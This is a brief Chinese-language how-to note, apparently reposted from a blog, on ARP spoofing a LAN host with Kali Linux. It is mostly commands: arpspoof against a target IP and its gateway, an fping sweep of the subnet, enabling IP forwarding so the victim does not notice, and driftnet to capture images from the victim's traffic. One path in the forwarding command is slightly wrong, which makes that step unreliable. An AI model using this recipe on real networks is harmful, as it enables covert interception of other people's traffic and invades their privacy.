kali之ARP欺骗

arpspoof -i kali网卡 -t 目标ip 网关
ifconfig得到网关,网卡eth0   
目标ip:192.168.216.131  网关:192.168.216.2   (ip route show)



看局域网ip   fping -asg 192.168.3.0/24


获取图片
arpspoof -i kali网卡 -t 目标ip 网关
进行ip流量转发 echo 1 >>proc/sys/net/ipv4/ip_forward    echo写命令不会有显示 成功欺骗,目标ip不会断网
driftnet  --》获取本机网卡的图片  
driftnet -i eth0



查看Ubuntu网关 ip route show

原文地址:https://www.cnblogs.com/sugarxt/p/10557648.html